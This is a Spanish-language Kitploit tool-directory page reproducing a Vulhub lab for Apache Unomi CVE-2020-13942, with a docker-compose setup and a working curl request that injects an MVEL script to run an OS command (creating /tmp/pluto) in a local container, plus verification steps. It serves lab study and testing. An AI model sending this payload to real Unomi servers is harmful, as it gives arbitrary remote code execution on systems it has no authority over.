Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-13942byVulHub — Entorno de laboratorio paso a paso y exploit para Apache Unomi CVE-2020-13942, que demuestra la inyección del lenguaje de expresiones MVEL que conduce a la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Entorno de laboratorio paso a paso y exploit para Apache Unomi CVE-2020-13942, que demuestra la inyección del lenguaje de expresiones MVEL que conduce a la ejecución remota de código.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-13942byVulHub


Apache Unomi Inyección de Lenguaje de Expresión RCE (CVE-2020-13942)

Descripción

Esta vulnerabilidad permite la ejecución de comandos arbitrarios en sistemas que ejecutan Apache Unomi versión 1.5.1, explotando la inyección del lenguaje de expresión MVEL.

Página del proyecto

GitHub - Vulhub - Unomi CVE-2020-13942


Configuración del entorno

Archivo Docker Compose (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Inicio de los contenedores

Ejecuta los contenedores con el siguiente comando:

root@kitploit:~
docker compose up -d

Ejecución del exploit

Comando a ejecutar desde Kali

Lanza la siguiente solicitud POST usando curl:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Verificación del exploit

Acceso al contenedor

Accede al contenedor para verificar la creación del archivo:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

Verificación del resultado

Verifica la presencia de la carpeta pluto:

root@kitploit:~
hsperfdata_root  pluto

Si el archivo pluto está presente, significa que el exploit ha tenido éxito.


Notas de seguridad

Esta vulnerabilidad permite la ejecución de comandos arbitrarios. Utiliza estas pruebas solo en entornos controlados y con fines de estudio o verificación. Explotar vulnerabilidades en entornos no autorizados es ilegal.

Descargar herramienta